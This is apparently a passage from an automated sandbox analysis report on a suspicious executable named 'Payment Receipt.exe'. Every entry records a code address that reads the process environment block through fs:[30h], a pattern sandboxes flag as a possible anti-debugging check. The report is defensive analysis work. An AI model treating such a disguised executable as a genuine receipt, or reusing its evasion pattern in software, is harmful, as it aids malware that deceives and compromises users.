              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015A6154 mov eax, dword ptr fs:[00000030h]0_2_015A6154
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0159C156 mov eax, dword ptr fs:[00000030h]0_2_0159C156
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01634144 mov eax, dword ptr fs:[00000030h]0_2_01634144
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01634144 mov eax, dword ptr fs:[00000030h]0_2_01634144
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01634144 mov ecx, dword ptr fs:[00000030h]0_2_01634144
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01634144 mov eax, dword ptr fs:[00000030h]0_2_01634144
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01634144 mov eax, dword ptr fs:[00000030h]0_2_01634144
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01638158 mov eax, dword ptr fs:[00000030h]0_2_01638158
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0164E10E mov eax, dword ptr fs:[00000030h]0_2_0164E10E
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0164E10E mov ecx, dword ptr fs:[00000030h]0_2_0164E10E
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0164E10E mov eax, dword ptr fs:[00000030h]0_2_0164E10E
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0164E10E mov eax, dword ptr fs:[00000030h]0_2_0164E10E
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0164E10E mov ecx, dword ptr fs:[00000030h]0_2_0164E10E
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0164E10E mov eax, dword ptr fs:[00000030h]0_2_0164E10E
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0164E10E mov eax, dword ptr fs:[00000030h]0_2_0164E10E
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0164E10E mov ecx, dword ptr fs:[00000030h]0_2_0164E10E
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0164E10E mov eax, dword ptr fs:[00000030h]0_2_0164E10E
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0164E10E mov ecx, dword ptr fs:[00000030h]0_2_0164E10E
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01660115 mov eax, dword ptr fs:[00000030h]0_2_01660115
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015D0124 mov eax, dword ptr fs:[00000030h]0_2_015D0124
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0164A118 mov ecx, dword ptr fs:[00000030h]0_2_0164A118
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0164A118 mov eax, dword ptr fs:[00000030h]0_2_0164A118
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0164A118 mov eax, dword ptr fs:[00000030h]0_2_0164A118
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0164A118 mov eax, dword ptr fs:[00000030h]0_2_0164A118
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_016761E5 mov eax, dword ptr fs:[00000030h]0_2_016761E5
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_016661C3 mov eax, dword ptr fs:[00000030h]0_2_016661C3
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_016661C3 mov eax, dword ptr fs:[00000030h]0_2_016661C3
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015D01F8 mov eax, dword ptr fs:[00000030h]0_2_015D01F8
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0161E1D0 mov eax, dword ptr fs:[00000030h]0_2_0161E1D0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0161E1D0 mov eax, dword ptr fs:[00000030h]0_2_0161E1D0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0161E1D0 mov ecx, dword ptr fs:[00000030h]0_2_0161E1D0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0161E1D0 mov eax, dword ptr fs:[00000030h]0_2_0161E1D0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0161E1D0 mov eax, dword ptr fs:[00000030h]0_2_0161E1D0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0159A197 mov eax, dword ptr fs:[00000030h]0_2_0159A197
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0159A197 mov eax, dword ptr fs:[00000030h]0_2_0159A197
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0159A197 mov eax, dword ptr fs:[00000030h]0_2_0159A197
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015E0185 mov eax, dword ptr fs:[00000030h]0_2_015E0185
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01644180 mov eax, dword ptr fs:[00000030h]0_2_01644180
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01644180 mov eax, dword ptr fs:[00000030h]0_2_01644180
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0165C188 mov eax, dword ptr fs:[00000030h]0_2_0165C188
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0165C188 mov eax, dword ptr fs:[00000030h]0_2_0165C188
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0162019F mov eax, dword ptr fs:[00000030h]0_2_0162019F
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0162019F mov eax, dword ptr fs:[00000030h]0_2_0162019F
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0162019F mov eax, dword ptr fs:[00000030h]0_2_0162019F
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0162019F mov eax, dword ptr fs:[00000030h]0_2_0162019F
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015A2050 mov eax, dword ptr fs:[00000030h]0_2_015A2050
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015CC073 mov eax, dword ptr fs:[00000030h]0_2_015CC073
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01626050 mov eax, dword ptr fs:[00000030h]0_2_01626050
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015BE016 mov eax, dword ptr fs:[00000030h]0_2_015BE016
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015BE016 mov eax, dword ptr fs:[00000030h]0_2_015BE016
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015BE016 mov eax, dword ptr fs:[00000030h]0_2_015BE016
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015BE016 mov eax, dword ptr fs:[00000030h]0_2_015BE016
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01636030 mov eax, dword ptr fs:[00000030h]0_2_01636030
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01624000 mov ecx, dword ptr fs:[00000030h]0_2_01624000
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01642000 mov eax, dword ptr fs:[00000030h]0_2_01642000
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01642000 mov eax, dword ptr fs:[00000030h]0_2_01642000
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01642000 mov eax, dword ptr fs:[00000030h]0_2_01642000
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01642000 mov eax, dword ptr fs:[00000030h]0_2_01642000
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01642000 mov eax, dword ptr fs:[00000030h]0_2_01642000
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01642000 mov eax, dword ptr fs:[00000030h]0_2_01642000
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01642000 mov eax, dword ptr fs:[00000030h]0_2_01642000
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01642000 mov eax, dword ptr fs:[00000030h]0_2_01642000
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0159A020 mov eax, dword ptr fs:[00000030h]0_2_0159A020
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0159C020 mov eax, dword ptr fs:[00000030h]0_2_0159C020
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_016260E0 mov eax, dword ptr fs:[00000030h]0_2_016260E0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0159C0F0 mov eax, dword ptr fs:[00000030h]0_2_0159C0F0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015E20F0 mov ecx, dword ptr fs:[00000030h]0_2_015E20F0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015A80E9 mov eax, dword ptr fs:[00000030h]0_2_015A80E9
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0159A0E3 mov ecx, dword ptr fs:[00000030h]0_2_0159A0E3
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_016220DE mov eax, dword ptr fs:[00000030h]0_2_016220DE
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_016380A8 mov eax, dword ptr fs:[00000030h]0_2_016380A8
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015A208A mov eax, dword ptr fs:[00000030h]0_2_015A208A
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_016660B8 mov eax, dword ptr fs:[00000030h]0_2_016660B8
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_016660B8 mov ecx, dword ptr fs:[00000030h]0_2_016660B8
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015980A0 mov eax, dword ptr fs:[00000030h]0_2_015980A0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0164437C mov eax, dword ptr fs:[00000030h]0_2_0164437C
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0167634F mov eax, dword ptr fs:[00000030h]0_2_0167634F
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01622349 mov eax, dword ptr fs:[00000030h]0_2_01622349
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01622349 mov eax, dword ptr fs:[00000030h]0_2_01622349
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01622349 mov eax, dword ptr fs:[00000030h]0_2_01622349
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01622349 mov eax, dword ptr fs:[00000030h]0_2_01622349
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01622349 mov eax, dword ptr fs:[00000030h]0_2_01622349
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01622349 mov eax, dword ptr fs:[00000030h]0_2_01622349
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01622349 mov eax, dword ptr fs:[00000030h]0_2_01622349
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01622349 mov eax, dword ptr fs:[00000030h]0_2_01622349
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01622349 mov eax, dword ptr fs:[00000030h]0_2_01622349
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01622349 mov eax, dword ptr fs:[00000030h]0_2_01622349
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01622349 mov eax, dword ptr fs:[00000030h]0_2_01622349
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01622349 mov eax, dword ptr fs:[00000030h]0_2_01622349
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01622349 mov eax, dword ptr fs:[00000030h]0_2_01622349
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01622349 mov eax, dword ptr fs:[00000030h]0_2_01622349
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01622349 mov eax, dword ptr fs:[00000030h]0_2_01622349
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0166A352 mov eax, dword ptr fs:[00000030h]0_2_0166A352
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01648350 mov ecx, dword ptr fs:[00000030h]0_2_01648350
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0162035C mov eax, dword ptr fs:[00000030h]0_2_0162035C
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0162035C mov eax, dword ptr fs:[00000030h]0_2_0162035C
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0162035C mov eax, dword ptr fs:[00000030h]0_2_0162035C
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0162035C mov ecx, dword ptr fs:[00000030h]0_2_0162035C
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0162035C mov eax, dword ptr fs:[00000030h]0_2_0162035C
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0162035C mov eax, dword ptr fs:[00000030h]0_2_0162035C
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01678324 mov eax, dword ptr fs:[00000030h]0_2_01678324
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01678324 mov ecx, dword ptr fs:[00000030h]0_2_01678324
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01678324 mov eax, dword ptr fs:[00000030h]0_2_01678324
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01678324 mov eax, dword ptr fs:[00000030h]0_2_01678324
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0159C310 mov ecx, dword ptr fs:[00000030h]0_2_0159C310
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015C0310 mov ecx, dword ptr fs:[00000030h]0_2_015C0310
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015DA30B mov eax, dword ptr fs:[00000030h]0_2_015DA30B
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015DA30B mov eax, dword ptr fs:[00000030h]0_2_015DA30B
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015DA30B mov eax, dword ptr fs:[00000030h]0_2_015DA30B
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015AA3C0 mov eax, dword ptr fs:[00000030h]0_2_015AA3C0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015AA3C0 mov eax, dword ptr fs:[00000030h]0_2_015AA3C0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015AA3C0 mov eax, dword ptr fs:[00000030h]0_2_015AA3C0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015AA3C0 mov eax, dword ptr fs:[00000030h]0_2_015AA3C0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015AA3C0 mov eax, dword ptr fs:[00000030h]0_2_015AA3C0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015AA3C0 mov eax, dword ptr fs:[00000030h]0_2_015AA3C0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015A83C0 mov eax, dword ptr fs:[00000030h]0_2_015A83C0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015A83C0 mov eax, dword ptr fs:[00000030h]0_2_015A83C0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015A83C0 mov eax, dword ptr fs:[00000030h]0_2_015A83C0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015A83C0 mov eax, dword ptr fs:[00000030h]0_2_015A83C0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015D63FF mov eax, dword ptr fs:[00000030h]0_2_015D63FF
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_016263C0 mov eax, dword ptr fs:[00000030h]0_2_016263C0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0165C3CD mov eax, dword ptr fs:[00000030h]0_2_0165C3CD
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015BE3F0 mov eax, dword ptr fs:[00000030h]0_2_015BE3F0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015BE3F0 mov eax, dword ptr fs:[00000030h]0_2_015BE3F0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015BE3F0 mov eax, dword ptr fs:[00000030h]0_2_015BE3F0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_016443D4 mov eax, dword ptr fs:[00000030h]0_2_016443D4
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_016443D4 mov eax, dword ptr fs:[00000030h]0_2_016443D4
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B03E9 mov eax, dword ptr fs:[00000030h]0_2_015B03E9
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B03E9 mov eax, dword ptr fs:[00000030h]0_2_015B03E9
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B03E9 mov eax, dword ptr fs:[00000030h]0_2_015B03E9
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B03E9 mov eax, dword ptr fs:[00000030h]0_2_015B03E9
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B03E9 mov eax, dword ptr fs:[00000030h]0_2_015B03E9
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B03E9 mov eax, dword ptr fs:[00000030h]0_2_015B03E9
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B03E9 mov eax, dword ptr fs:[00000030h]0_2_015B03E9
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B03E9 mov eax, dword ptr fs:[00000030h]0_2_015B03E9
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0164E3DB mov eax, dword ptr fs:[00000030h]0_2_0164E3DB
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0164E3DB mov eax, dword ptr fs:[00000030h]0_2_0164E3DB
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0164E3DB mov ecx, dword ptr fs:[00000030h]0_2_0164E3DB
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0164E3DB mov eax, dword ptr fs:[00000030h]0_2_0164E3DB
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01598397 mov eax, dword ptr fs:[00000030h]0_2_01598397
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01598397 mov eax, dword ptr fs:[00000030h]0_2_01598397
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01598397 mov eax, dword ptr fs:[00000030h]0_2_01598397
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0159E388 mov eax, dword ptr fs:[00000030h]0_2_0159E388
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0159E388 mov eax, dword ptr fs:[00000030h]0_2_0159E388
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0159E388 mov eax, dword ptr fs:[00000030h]0_2_0159E388
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015C438F mov eax, dword ptr fs:[00000030h]0_2_015C438F
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015C438F mov eax, dword ptr fs:[00000030h]0_2_015C438F
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015A6259 mov eax, dword ptr fs:[00000030h]0_2_015A6259
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0159A250 mov eax, dword ptr fs:[00000030h]0_2_0159A250
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01650274 mov eax, dword ptr fs:[00000030h]0_2_01650274
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01650274 mov eax, dword ptr fs:[00000030h]0_2_01650274
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01650274 mov eax, dword ptr fs:[00000030h]0_2_01650274
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01650274 mov eax, dword ptr fs:[00000030h]0_2_01650274
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01650274 mov eax, dword ptr fs:[00000030h]0_2_01650274
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01650274 mov eax, dword ptr fs:[00000030h]0_2_01650274
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01650274 mov eax, dword ptr fs:[00000030h]0_2_01650274
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01650274 mov eax, dword ptr fs:[00000030h]0_2_01650274
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01650274 mov eax, dword ptr fs:[00000030h]0_2_01650274
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01650274 mov eax, dword ptr fs:[00000030h]0_2_01650274
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01650274 mov eax, dword ptr fs:[00000030h]0_2_01650274
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01650274 mov eax, dword ptr fs:[00000030h]0_2_01650274
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01628243 mov eax, dword ptr fs:[00000030h]0_2_01628243
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01628243 mov ecx, dword ptr fs:[00000030h]0_2_01628243
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0159826B mov eax, dword ptr fs:[00000030h]0_2_0159826B
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0165A250 mov eax, dword ptr fs:[00000030h]0_2_0165A250
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0165A250 mov eax, dword ptr fs:[00000030h]0_2_0165A250
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015A4260 mov eax, dword ptr fs:[00000030h]0_2_015A4260
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015A4260 mov eax, dword ptr fs:[00000030h]0_2_015A4260
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015A4260 mov eax, dword ptr fs:[00000030h]0_2_015A4260
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0167625D mov eax, dword ptr fs:[00000030h]0_2_0167625D
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0159823B mov eax, dword ptr fs:[00000030h]0_2_0159823B
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015AA2C3 mov eax, dword ptr fs:[00000030h]0_2_015AA2C3
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015AA2C3 mov eax, dword ptr fs:[00000030h]0_2_015AA2C3
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015AA2C3 mov eax, dword ptr fs:[00000030h]0_2_015AA2C3
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015AA2C3 mov eax, dword ptr fs:[00000030h]0_2_015AA2C3
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015AA2C3 mov eax, dword ptr fs:[00000030h]0_2_015AA2C3
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_016762D6 mov eax, dword ptr fs:[00000030h]0_2_016762D6
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B02E1 mov eax, dword ptr fs:[00000030h]0_2_015B02E1
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B02E1 mov eax, dword ptr fs:[00000030h]0_2_015B02E1
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B02E1 mov eax, dword ptr fs:[00000030h]0_2_015B02E1
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_016362A0 mov eax, dword ptr fs:[00000030h]0_2_016362A0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_016362A0 mov ecx, dword ptr fs:[00000030h]0_2_016362A0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_016362A0 mov eax, dword ptr fs:[00000030h]0_2_016362A0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_016362A0 mov eax, dword ptr fs:[00000030h]0_2_016362A0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_016362A0 mov eax, dword ptr fs:[00000030h]0_2_016362A0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_016362A0 mov eax, dword ptr fs:[00000030h]0_2_016362A0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015DE284 mov eax, dword ptr fs:[00000030h]0_2_015DE284
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015DE284 mov eax, dword ptr fs:[00000030h]0_2_015DE284
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01620283 mov eax, dword ptr fs:[00000030h]0_2_01620283
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01620283 mov eax, dword ptr fs:[00000030h]0_2_01620283
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01620283 mov eax, dword ptr fs:[00000030h]0_2_01620283
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B02A0 mov eax, dword ptr fs:[00000030h]0_2_015B02A0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B02A0 mov eax, dword ptr fs:[00000030h]0_2_015B02A0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015A8550 mov eax, dword ptr fs:[00000030h]0_2_015A8550
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015A8550 mov eax, dword ptr fs:[00000030h]0_2_015A8550
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015D656A mov eax, dword ptr fs:[00000030h]0_2_015D656A
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015D656A mov eax, dword ptr fs:[00000030h]0_2_015D656A
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015D656A mov eax, dword ptr fs:[00000030h]0_2_015D656A
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015CE53E mov eax, dword ptr fs:[00000030h]0_2_015CE53E
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015CE53E mov eax, dword ptr fs:[00000030h]0_2_015CE53E
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015CE53E mov eax, dword ptr fs:[00000030h]0_2_015CE53E
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015CE53E mov eax, dword ptr fs:[00000030h]0_2_015CE53E
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015CE53E mov eax, dword ptr fs:[00000030h]0_2_015CE53E
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01636500 mov eax, dword ptr fs:[00000030h]0_2_01636500
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01674500 mov eax, dword ptr fs:[00000030h]0_2_01674500
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01674500 mov eax, dword ptr fs:[00000030h]0_2_01674500
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01674500 mov eax, dword ptr fs:[00000030h]0_2_01674500
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01674500 mov eax, dword ptr fs:[00000030h]0_2_01674500
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01674500 mov eax, dword ptr fs:[00000030h]0_2_01674500
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01674500 mov eax, dword ptr fs:[00000030h]0_2_01674500
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01674500 mov eax, dword ptr fs:[00000030h]0_2_01674500
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B0535 mov eax, dword ptr fs:[00000030h]0_2_015B0535
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B0535 mov eax, dword ptr fs:[00000030h]0_2_015B0535
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B0535 mov eax, dword ptr fs:[00000030h]0_2_015B0535
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B0535 mov eax, dword ptr fs:[00000030h]0_2_015B0535
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B0535 mov eax, dword ptr fs:[00000030h]0_2_015B0535
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B0535 mov eax, dword ptr fs:[00000030h]0_2_015B0535
